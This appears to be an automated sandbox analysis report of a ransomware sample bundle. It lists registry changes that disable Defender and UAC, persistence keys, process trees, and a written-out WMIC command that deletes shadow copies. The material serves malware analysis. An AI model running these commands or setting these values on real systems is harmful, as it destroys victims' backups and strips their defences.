azorult | 77641998342582b73bcfe6d0e223187d46ad5e9da3db68bbb8aa16a4d3f47a60

description	ioc	Process
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "empty"	HEUR-Trojan-Ransom.MSIL.Encoder.gen-e43e08f74b30e6493f2753bb1eb2463fd41b0a0853d5a208652763db02e6160d.exe

Modifies Windows Defender Real-time Protection settings 3 TTPs 2 IoCs

evasion trojan

Modify Registry

Windows Service

Disable or Modify Tools

T1562.001

description	ioc	Process
Key created	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection	HEUR-Trojan-Ransom.MSIL.Encoder.gen-e43e08f74b30e6493f2753bb1eb2463fd41b0a0853d5a208652763db02e6160d.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1"	HEUR-Trojan-Ransom.MSIL.Encoder.gen-e43e08f74b30e6493f2753bb1eb2463fd41b0a0853d5a208652763db02e6160d.exe

UAC bypass 3 TTPs 1 IoCs

evasion trojan

Bypass User Account Control

T1548.002

Disable or Modify Tools

T1562.001

Modify Registry

description	ioc	Process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	HEUR-Trojan-Ransom.MSIL.Encoder.gen-e43e08f74b30e6493f2753bb1eb2463fd41b0a0853d5a208652763db02e6160d.exe

Urelas
Urelas is a trojan targeting card games.
trojan urelas
Urelas family
urelas
Deletes shadow copies 3 TTPs
Ransomware often targets backup files to inhibit system recovery.
ransomware defense_evasion impact execution

File Deletion
T1070.004

Inhibit System Recovery
T1490

Windows Management Instrumentation
T1047

Modifies boot configuration data using bcdedit 1 TTPs 2 IoCs

ransomware evasion

Inhibit System Recovery

pid	Process
7036	bcdedit.exe
4376	bcdedit.exe

Deletes backup catalog 3 TTPs 1 IoCs

Uses wbadmin.exe to inhibit system recovery.

ransomware

Command and Scripting Interpreter

T1059

File Deletion

T1070.004

Inhibit System Recovery

pid	Process
5784	wbadmin.exe

Disables RegEdit via registry modification 1 IoCs

description	ioc	Process
Set value (int)	\REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\DisableRegistryTools = "1"	HEUR-Trojan-Ransom.MSIL.Encoder.gen-e43e08f74b30e6493f2753bb1eb2463fd41b0a0853d5a208652763db02e6160d.exe

Disables Task Manager via registry modification
evasion

Modifies Windows Firewall 2 TTPs 2 IoCs

Windows Service

Disable or Modify System Firewall

T1562.004

pid	Process
2540	netsh.exe
9096	netsh.exe

Executes dropped EXE 9 IoCs

pid	Process
452	HEUR-Trojan-Ransom.MSIL.Encoder.gen-e43e08f74b30e6493f2753bb1eb2463fd41b0a0853d5a208652763db02e6160d.exe
4752	HEUR-Trojan-Ransom.MSIL.Foreign.gen-98894973a86aa01c4f7496ae339dc73b5e6da2f1dbcd5fe1215f70ea7b889b85.exe
4860	HEUR-Trojan-Ransom.MSIL.Gen.gen-d60bf63416c2b63cb1940b365baeab8281c60bf327df398eca9acf84bd9a83b5.exe
3612	HEUR-Trojan-Ransom.Win32.Cryptor.gen-1ce8a939b3e7d84c59c12dc9e1091532f4336dac533847b6533b01d9dcf494e9.exe
2460	HEUR-Trojan-Ransom.Win32.Gen.gen-dc6b0e8c1e9c113f0364e1c8370060dee3fcbe25b667ddeca7623a95cd21411f.exe
1516	MsMpEng.exe
4156	HEUR-Trojan-Ransom.Win32.Generic-11e5d7ef5bdcb1a257da2b40318ec6dd16864bc0e69274dd016899cb92c389fd.exe
2720	HEUR-Trojan-Ransom.Win32.Generic-27a1f89ce5a37815010c8411dddec85d5d66e81a957ad722fbd2dc64f99651c8.exe
4700	HEUR-Trojan-Ransom.Win32.Generic-8c723af5c826adea162ef3f2e37a1cca7b43d549c9a5fab7c9ff17f65eb5d8e7.exe

Impair Defenses: Safe Mode Boot 1 TTPs 1 IoCs

defense_evasion

Safe Mode Boot

T1562.009

description	ioc	Process
Set value (int)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SafeBoot\Minimal\MinimalX = "1"	HEUR-Trojan-Ransom.MSIL.Encoder.gen-e43e08f74b30e6493f2753bb1eb2463fd41b0a0853d5a208652763db02e6160d.exe

Loads dropped DLL 1 IoCs

pid	Process
1516	MsMpEng.exe

VMProtect packed file 2 IoCs

Detects executables packed with VMProtect commercial packer.

vmprotect

resource	yara_rule
behavioral1/files/0x0007000000023c7a-219.dat	vmprotect
behavioral1/memory/3056-331-0x0000000000ED0000-0x0000000001B86000-memory.dmp	vmprotect

Adds Run key to start application 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Ransom = "C:\\Users\\Admin\\Desktop\\00434\\HEUR-Trojan-Ransom.MSIL.Encoder.gen-e43e08f74b30e6493f2753bb1eb2463fd41b0a0853d5a208652763db02e6160d.exe"	HEUR-Trojan-Ransom.MSIL.Encoder.gen-e43e08f74b30e6493f2753bb1eb2463fd41b0a0853d5a208652763db02e6160d.exe

Checks whether UAC is enabled 1 TTPs 2 IoCs

evasion trojan

System Information Discovery

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	HEUR-Trojan-Ransom.MSIL.Encoder.gen-e43e08f74b30e6493f2753bb1eb2463fd41b0a0853d5a208652763db02e6160d.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	HEUR-Trojan-Ransom.MSIL.Encoder.gen-e43e08f74b30e6493f2753bb1eb2463fd41b0a0853d5a208652763db02e6160d.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

Using powershell.exe command.

execution

PowerShell

T1059.001

pid	Process
14688	powershell.exe

Drops desktop.ini file(s) 1 IoCs

description	ioc	Process
File created	C:\Users\Admin\Desktop\desktop.ini	HEUR-Trojan-Ransom.MSIL.Encoder.gen-e43e08f74b30e6493f2753bb1eb2463fd41b0a0853d5a208652763db02e6160d.exe

Sets desktop wallpaper using registry 2 TTPs 1 IoCs

ransomware

Defacement

T1491

Modify Registry

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000\Control Panel\Desktop\Wallpaper	HEUR-Trojan-Ransom.MSIL.Encoder.gen-e43e08f74b30e6493f2753bb1eb2463fd41b0a0853d5a208652763db02e6160d.exe

UPX packed file 3 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral1/files/0x0007000000023c7f-3985.dat	upx
behavioral1/memory/5248-4005-0x0000000000400000-0x0000000000489000-memory.dmp	upx
behavioral1/memory/5248-5381-0x0000000000400000-0x0000000000489000-memory.dmp	upx

Launches sc.exe 8 IoCs

Sc.exe is a Windows utlilty to control services on the system.

pid	Process
5176	sc.exe
5268	sc.exe
956	sc.exe
5644	sc.exe
3972	sc.exe
6752	sc.exe
6420	sc.exe
1252	sc.exe

Program crash 1 IoCs

pid	pid_target	Process	procid_target
6316	1044	WerFault.exe	139

System Location Discovery: System Language Discovery 1 TTPs 9 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	HEUR-Trojan-Ransom.MSIL.Gen.gen-d60bf63416c2b63cb1940b365baeab8281c60bf327df398eca9acf84bd9a83b5.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	HEUR-Trojan-Ransom.Win32.Cryptor.gen-1ce8a939b3e7d84c59c12dc9e1091532f4336dac533847b6533b01d9dcf494e9.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	HEUR-Trojan-Ransom.Win32.Gen.gen-dc6b0e8c1e9c113f0364e1c8370060dee3fcbe25b667ddeca7623a95cd21411f.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	MsMpEng.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	HEUR-Trojan-Ransom.Win32.Generic-11e5d7ef5bdcb1a257da2b40318ec6dd16864bc0e69274dd016899cb92c389fd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	HEUR-Trojan-Ransom.Win32.Generic-27a1f89ce5a37815010c8411dddec85d5d66e81a957ad722fbd2dc64f99651c8.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	net.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	net1.exe

Checks SCSI registry key(s) 3 TTPs 12 IoCs

SCSI information is often read in order to detect sandboxing environments.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\FriendlyName	taskmgr.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\FriendlyName	taskmgr.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000	taskmgr.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Properties\{b725f130-47ef-101a-a5f1-02608c9eebac}\000A	taskmgr.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\FriendlyName	taskmgr.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000	taskmgr.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Properties\{b725f130-47ef-101a-a5f1-02608c9eebac}\000A	taskmgr.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\FriendlyName	taskmgr.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000	taskmgr.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Properties\{b725f130-47ef-101a-a5f1-02608c9eebac}\000A	taskmgr.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000	taskmgr.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Properties\{b725f130-47ef-101a-a5f1-02608c9eebac}\000A	taskmgr.exe

Checks processor information in registry 2 TTPs 2 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	HEUR-Trojan-Ransom.Win32.Generic-27a1f89ce5a37815010c8411dddec85d5d66e81a957ad722fbd2dc64f99651c8.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	HEUR-Trojan-Ransom.Win32.Generic-27a1f89ce5a37815010c8411dddec85d5d66e81a957ad722fbd2dc64f99651c8.exe

Interacts with shadow copies 3 TTPs 1 IoCs

Shadow copies are often targeted by ransomware to inhibit system recovery.

ransomware

File Deletion

T1070.004

Inhibit System Recovery

Direct Volume Access

T1006

pid	Process
6768	vssadmin.exe

Kills process with taskkill 23 IoCs

pid	Process
2832	taskkill.exe
14100	taskkill.exe
14076	taskkill.exe
4100	taskkill.exe
6704	taskkill.exe
5584	taskkill.exe
6640	taskkill.exe
9376	taskkill.exe
7000	taskkill.exe
10152	taskkill.exe
17152	taskkill.exe
17664	taskkill.exe
10340	taskkill.exe
6396	taskkill.exe
12412	taskkill.exe
5912	taskkill.exe
6400	taskkill.exe
228	taskkill.exe
5928	taskkill.exe
2708	taskkill.exe
9992	taskkill.exe
6816	taskkill.exe
5520	taskkill.exe

Modifies registry key 1 TTPs 1 IoCs

Modify Registry

pid	Process
5144	reg.exe

Runs net.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
3356	taskmgr.exe
3356	taskmgr.exe
3356	taskmgr.exe
3356	taskmgr.exe
3356	taskmgr.exe
3444	taskmgr.exe
3444	taskmgr.exe
3444	taskmgr.exe
3444	taskmgr.exe
1760	taskmgr.exe
1760	taskmgr.exe
1760	taskmgr.exe
1760	taskmgr.exe
1760	taskmgr.exe
1760	taskmgr.exe
1688	taskmgr.exe
1688	taskmgr.exe
1688	taskmgr.exe
1688	taskmgr.exe
1688	taskmgr.exe
1688	taskmgr.exe
1688	taskmgr.exe
1688	taskmgr.exe
1688	taskmgr.exe
1688	taskmgr.exe
1688	taskmgr.exe
1688	taskmgr.exe
1688	taskmgr.exe
1688	taskmgr.exe
1688	taskmgr.exe
1688	taskmgr.exe
1688	taskmgr.exe
1688	taskmgr.exe
1688	taskmgr.exe
1688	taskmgr.exe
1688	taskmgr.exe
1688	taskmgr.exe
1688	taskmgr.exe
1688	taskmgr.exe
1688	taskmgr.exe
1688	taskmgr.exe
1688	taskmgr.exe
1688	taskmgr.exe
1688	taskmgr.exe
1688	taskmgr.exe
1688	taskmgr.exe
1688	taskmgr.exe
1688	taskmgr.exe
1688	taskmgr.exe
1688	taskmgr.exe
1688	taskmgr.exe
1688	taskmgr.exe
1688	taskmgr.exe
1688	taskmgr.exe
1688	taskmgr.exe
1688	taskmgr.exe
1688	taskmgr.exe
1688	taskmgr.exe
1688	taskmgr.exe
1688	taskmgr.exe
1688	taskmgr.exe
1688	taskmgr.exe
1688	taskmgr.exe
1688	taskmgr.exe

Suspicious behavior: GetForegroundWindowSpam 2 IoCs

pid	Process
4808	7zFM.exe
1688	taskmgr.exe

Suspicious use of AdjustPrivilegeToken 27 IoCs

description	pid	Process
Token: SeRestorePrivilege	4808	7zFM.exe
Token: 35	4808	7zFM.exe
Token: SeSecurityPrivilege	4808	7zFM.exe
Token: SeDebugPrivilege	3356	taskmgr.exe
Token: SeSystemProfilePrivilege	3356	taskmgr.exe
Token: SeCreateGlobalPrivilege	3356	taskmgr.exe
Token: SeDebugPrivilege	3444	taskmgr.exe
Token: SeSystemProfilePrivilege	3444	taskmgr.exe
Token: SeCreateGlobalPrivilege	3444	taskmgr.exe
Token: 33	3356	taskmgr.exe
Token: SeIncBasePriorityPrivilege	3356	taskmgr.exe
Token: SeDebugPrivilege	1760	taskmgr.exe
Token: SeSystemProfilePrivilege	1760	taskmgr.exe
Token: SeCreateGlobalPrivilege	1760	taskmgr.exe
Token: 33	3444	taskmgr.exe
Token: SeIncBasePriorityPrivilege	3444	taskmgr.exe
Token: SeDebugPrivilege	1688	taskmgr.exe
Token: SeSystemProfilePrivilege	1688	taskmgr.exe
Token: SeCreateGlobalPrivilege	1688	taskmgr.exe
Token: 33	1760	taskmgr.exe
Token: SeIncBasePriorityPrivilege	1760	taskmgr.exe
Token: SeDebugPrivilege	2100	powershell.exe
Token: SeDebugPrivilege	3988	powershell.exe
Token: SeBackupPrivilege	2744	vssvc.exe
Token: SeRestorePrivilege	2744	vssvc.exe
Token: SeAuditPrivilege	2744	vssvc.exe
Token: SeDebugPrivilege	452	HEUR-Trojan-Ransom.MSIL.Encoder.gen-e43e08f74b30e6493f2753bb1eb2463fd41b0a0853d5a208652763db02e6160d.exe

Suspicious use of FindShellTrayWindow 64 IoCs

pid	Process
4808	7zFM.exe
4808	7zFM.exe
3356	taskmgr.exe
3356	taskmgr.exe
3356	taskmgr.exe
3356	taskmgr.exe
3356	taskmgr.exe
3356	taskmgr.exe
3356	taskmgr.exe
3356	taskmgr.exe
3356	taskmgr.exe
3356	taskmgr.exe
3356	taskmgr.exe
3356	taskmgr.exe
3356	taskmgr.exe
3356	taskmgr.exe
3356	taskmgr.exe
3356	taskmgr.exe
3356	taskmgr.exe
3356	taskmgr.exe
3356	taskmgr.exe
3356	taskmgr.exe
3444	taskmgr.exe
3444	taskmgr.exe
3356	taskmgr.exe
3444	taskmgr.exe
3356	taskmgr.exe
3444	taskmgr.exe
3356	taskmgr.exe
3444	taskmgr.exe
3356	taskmgr.exe
3444	taskmgr.exe
3356	taskmgr.exe
3444	taskmgr.exe
3356	taskmgr.exe
3444	taskmgr.exe
3356	taskmgr.exe
3444	taskmgr.exe
3356	taskmgr.exe
3444	taskmgr.exe
3356	taskmgr.exe
3444	taskmgr.exe
3356	taskmgr.exe
3444	taskmgr.exe
3356	taskmgr.exe
3444	taskmgr.exe
3444	taskmgr.exe
3444	taskmgr.exe
3444	taskmgr.exe
3444	taskmgr.exe
3444	taskmgr.exe
3444	taskmgr.exe
3444	taskmgr.exe
1760	taskmgr.exe
3444	taskmgr.exe
1760	taskmgr.exe
3444	taskmgr.exe
1760	taskmgr.exe
3444	taskmgr.exe
1760	taskmgr.exe
3444	taskmgr.exe
1760	taskmgr.exe
3444	taskmgr.exe
1760	taskmgr.exe

Suspicious use of SendNotifyMessage 64 IoCs

pid	Process
3356	taskmgr.exe
3356	taskmgr.exe
3356	taskmgr.exe
3356	taskmgr.exe
3356	taskmgr.exe
3356	taskmgr.exe
3356	taskmgr.exe
3356	taskmgr.exe
3356	taskmgr.exe
3356	taskmgr.exe
3356	taskmgr.exe
3356	taskmgr.exe
3356	taskmgr.exe
3356	taskmgr.exe
3356	taskmgr.exe
3356	taskmgr.exe
3356	taskmgr.exe
3356	taskmgr.exe
3356	taskmgr.exe
3356	taskmgr.exe
3444	taskmgr.exe
3444	taskmgr.exe
3356	taskmgr.exe
3444	taskmgr.exe
3356	taskmgr.exe
3444	taskmgr.exe
3356	taskmgr.exe
3444	taskmgr.exe
3356	taskmgr.exe
3444	taskmgr.exe
3356	taskmgr.exe
3444	taskmgr.exe
3356	taskmgr.exe
3444	taskmgr.exe
3356	taskmgr.exe
3444	taskmgr.exe
3356	taskmgr.exe
3444	taskmgr.exe
3356	taskmgr.exe
3444	taskmgr.exe
3356	taskmgr.exe
3444	taskmgr.exe
3356	taskmgr.exe
3444	taskmgr.exe
3444	taskmgr.exe
3444	taskmgr.exe
3444	taskmgr.exe
3444	taskmgr.exe
3444	taskmgr.exe
3444	taskmgr.exe
3444	taskmgr.exe
1760	taskmgr.exe
3444	taskmgr.exe
1760	taskmgr.exe
3444	taskmgr.exe
1760	taskmgr.exe
3444	taskmgr.exe
1760	taskmgr.exe
3444	taskmgr.exe
1760	taskmgr.exe
3444	taskmgr.exe
1760	taskmgr.exe
3444	taskmgr.exe
1760	taskmgr.exe

Suspicious use of WriteProcessMemory 43 IoCs

description	pid	Process	procid_target
PID 3356 wrote to memory of 3444	3356	taskmgr.exe	102
PID 3356 wrote to memory of 3444	3356	taskmgr.exe	102
PID 3444 wrote to memory of 1760	3444	taskmgr.exe	103
PID 3444 wrote to memory of 1760	3444	taskmgr.exe	103
PID 1760 wrote to memory of 1688	1760	taskmgr.exe	104
PID 1760 wrote to memory of 1688	1760	taskmgr.exe	104
PID 3988 wrote to memory of 1388	3988	powershell.exe	116
PID 3988 wrote to memory of 1388	3988	powershell.exe	116
PID 1388 wrote to memory of 452	1388	cmd.exe	117
PID 1388 wrote to memory of 452	1388	cmd.exe	117
PID 1388 wrote to memory of 4752	1388	cmd.exe	118
PID 1388 wrote to memory of 4752	1388	cmd.exe	118
PID 1388 wrote to memory of 4860	1388	cmd.exe	119
PID 1388 wrote to memory of 4860	1388	cmd.exe	119
PID 1388 wrote to memory of 4860	1388	cmd.exe	119
PID 1388 wrote to memory of 3612	1388	cmd.exe	120
PID 1388 wrote to memory of 3612	1388	cmd.exe	120
PID 1388 wrote to memory of 3612	1388	cmd.exe	120
PID 1388 wrote to memory of 2460	1388	cmd.exe	121
PID 1388 wrote to memory of 2460	1388	cmd.exe	121
PID 1388 wrote to memory of 2460	1388	cmd.exe	121
PID 2460 wrote to memory of 1516	2460	HEUR-Trojan-Ransom.Win32.Gen.gen-dc6b0e8c1e9c113f0364e1c8370060dee3fcbe25b667ddeca7623a95cd21411f.exe	122
PID 2460 wrote to memory of 1516	2460	HEUR-Trojan-Ransom.Win32.Gen.gen-dc6b0e8c1e9c113f0364e1c8370060dee3fcbe25b667ddeca7623a95cd21411f.exe	122
PID 2460 wrote to memory of 1516	2460	HEUR-Trojan-Ransom.Win32.Gen.gen-dc6b0e8c1e9c113f0364e1c8370060dee3fcbe25b667ddeca7623a95cd21411f.exe	122
PID 1388 wrote to memory of 4156	1388	cmd.exe	123
PID 1388 wrote to memory of 4156	1388	cmd.exe	123
PID 1388 wrote to memory of 4156	1388	cmd.exe	123
PID 4156 wrote to memory of 3804	4156	HEUR-Trojan-Ransom.Win32.Generic-11e5d7ef5bdcb1a257da2b40318ec6dd16864bc0e69274dd016899cb92c389fd.exe	127
PID 4156 wrote to memory of 3804	4156	HEUR-Trojan-Ransom.Win32.Generic-11e5d7ef5bdcb1a257da2b40318ec6dd16864bc0e69274dd016899cb92c389fd.exe	127
PID 4156 wrote to memory of 3804	4156	HEUR-Trojan-Ransom.Win32.Generic-11e5d7ef5bdcb1a257da2b40318ec6dd16864bc0e69274dd016899cb92c389fd.exe	127
PID 1388 wrote to memory of 2720	1388	cmd.exe	129
PID 1388 wrote to memory of 2720	1388	cmd.exe	129
PID 1388 wrote to memory of 2720	1388	cmd.exe	129
PID 3804 wrote to memory of 4464	3804	cmd.exe	159
PID 3804 wrote to memory of 4464	3804	cmd.exe	159
PID 3804 wrote to memory of 4464	3804	cmd.exe	159
PID 4464 wrote to memory of 2436	4464	net.exe	133
PID 4464 wrote to memory of 2436	4464	net.exe	133
PID 4464 wrote to memory of 2436	4464	net.exe	133
PID 3612 wrote to memory of 3436	3612	HEUR-Trojan-Ransom.Win32.Cryptor.gen-1ce8a939b3e7d84c59c12dc9e1091532f4336dac533847b6533b01d9dcf494e9.exe	135
PID 3612 wrote to memory of 3436	3612	HEUR-Trojan-Ransom.Win32.Cryptor.gen-1ce8a939b3e7d84c59c12dc9e1091532f4336dac533847b6533b01d9dcf494e9.exe	135
PID 1388 wrote to memory of 4700	1388	cmd.exe	134
PID 1388 wrote to memory of 4700	1388	cmd.exe	134

System policy modification 1 TTPs 3 IoCs

Modify Registry

description	ioc	Process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\WindowsDefenderMAJ = "1"	HEUR-Trojan-Ransom.MSIL.Encoder.gen-e43e08f74b30e6493f2753bb1eb2463fd41b0a0853d5a208652763db02e6160d.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	HEUR-Trojan-Ransom.MSIL.Encoder.gen-e43e08f74b30e6493f2753bb1eb2463fd41b0a0853d5a208652763db02e6160d.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoControlPanel = "1"	HEUR-Trojan-Ransom.MSIL.Encoder.gen-e43e08f74b30e6493f2753bb1eb2463fd41b0a0853d5a208652763db02e6160d.exe

Uses Volume Shadow Copy service COM API
The Volume Shadow Copy service is used to manage backups/snapshots.
ransomware

C:\Program Files\7-Zip\7zFM.exe
"C:\Program Files\7-Zip\7zFM.exe" "C:\Users\Admin\AppData\Local\Temp\RNSM00434.7z"
1⤵
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
PID:4808

C:\Windows\system32\taskmgr.exe
"C:\Windows\system32\taskmgr.exe" /4
1⤵
- Checks SCSI registry key(s)
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:3356
- C:\Windows\system32\taskmgr.exe
  "C:\Windows\system32\taskmgr.exe" /1
  2⤵
  - Checks SCSI registry key(s)
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of FindShellTrayWindow
  - Suspicious use of SendNotifyMessage
  - Suspicious use of WriteProcessMemory
  PID:3444
- - C:\Windows\system32\taskmgr.exe
    "C:\Windows\system32\taskmgr.exe" /1
    3⤵
    - Checks SCSI registry key(s)
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of FindShellTrayWindow
    - Suspicious use of SendNotifyMessage
    - Suspicious use of WriteProcessMemory
    PID:1760
  - - C:\Windows\system32\taskmgr.exe
      "C:\Windows\system32\taskmgr.exe" /1
      4⤵
      Checks SCSI registry key(s)
      Suspicious behavior: EnumeratesProcesses
      Suspicious behavior: GetForegroundWindowSpam
      Suspicious use of AdjustPrivilegeToken
      PID:1688

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
1⤵
- Suspicious use of AdjustPrivilegeToken
PID:2100

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
1⤵
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3988
- C:\Windows\system32\cmd.exe
  "C:\Windows\system32\cmd.exe"
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:1388
- - C:\Users\Admin\Desktop\00434\HEUR-Trojan-Ransom.MSIL.Encoder.gen-e43e08f74b30e6493f2753bb1eb2463fd41b0a0853d5a208652763db02e6160d.exe
    HEUR-Trojan-Ransom.MSIL.Encoder.gen-e43e08f74b30e6493f2753bb1eb2463fd41b0a0853d5a208652763db02e6160d.exe
    3⤵
    - Modifies WinLogon for persistence
    - Modifies Windows Defender Real-time Protection settings
    - UAC bypass
    - Disables RegEdit via registry modification
    - Executes dropped EXE
    - Impair Defenses: Safe Mode Boot
    - Adds Run key to start application
    - Checks whether UAC is enabled
    - Drops desktop.ini file(s)
    - Sets desktop wallpaper using registry
    - Suspicious use of AdjustPrivilegeToken
    - System policy modification
    PID:452
- - C:\Users\Admin\Desktop\00434\HEUR-Trojan-Ransom.MSIL.Foreign.gen-98894973a86aa01c4f7496ae339dc73b5e6da2f1dbcd5fe1215f70ea7b889b85.exe
    HEUR-Trojan-Ransom.MSIL.Foreign.gen-98894973a86aa01c4f7496ae339dc73b5e6da2f1dbcd5fe1215f70ea7b889b85.exe
    3⤵
    - Executes dropped EXE
    PID:4752
- - C:\Users\Admin\Desktop\00434\HEUR-Trojan-Ransom.MSIL.Gen.gen-d60bf63416c2b63cb1940b365baeab8281c60bf327df398eca9acf84bd9a83b5.exe
    HEUR-Trojan-Ransom.MSIL.Gen.gen-d60bf63416c2b63cb1940b365baeab8281c60bf327df398eca9acf84bd9a83b5.exe
    3⤵
    - Executes dropped EXE
    - System Location Discovery: System Language Discovery
    PID:4860
- - C:\Users\Admin\Desktop\00434\HEUR-Trojan-Ransom.Win32.Cryptor.gen-1ce8a939b3e7d84c59c12dc9e1091532f4336dac533847b6533b01d9dcf494e9.exe
    HEUR-Trojan-Ransom.Win32.Cryptor.gen-1ce8a939b3e7d84c59c12dc9e1091532f4336dac533847b6533b01d9dcf494e9.exe
    3⤵
    - Executes dropped EXE
    - System Location Discovery: System Language Discovery
    - Suspicious use of WriteProcessMemory
    PID:3612
  - - C:\Windows\SYSTEM32\cmd.exe
      cmd.exe /c C:\Windows\System32\wbem\WMIC.exe shadowcopy where "ID='{B73E7983-AA33-419D-BAF8-A90C0C18FA26}'" delete
      4⤵
      PID:3436
    - - C:\Windows\System32\wbem\WMIC.exe
        
        C:\Windows\System32\wbem\WMIC.exe shadowcopy where "ID='{B73E7983-AA33-419D-BAF8-A90C0C18FA26}'" delete
        5⤵
        
        PID:2608
- - C:\Users\Admin\Desktop\00434\HEUR-Trojan-Ransom.Win32.Gen.gen-dc6b0e8c1e9c113f0364e1c8370060dee3fcbe25b667ddeca7623a95cd21411f.exe
    HEUR-Trojan-Ransom.Win32.Gen.gen-dc6b0e8c1e9c113f0364e1c8370060dee3fcbe25b667ddeca7623a95cd21411f.exe
    3⤵
    - Executes dropped EXE
    - System Location Discovery: System Language Discovery
    - Suspicious use of WriteProcessMemory
    PID:2460
  - - C:\Users\Admin\AppData\Local\Temp\MsMpEng.exe
      "C:\Users\Admin\AppData\Local\Temp\MsMpEng.exe"
      4⤵
      Executes dropped EXE
      Loads dropped DLL
      System Location Discovery: System Language Discovery
      PID:1516
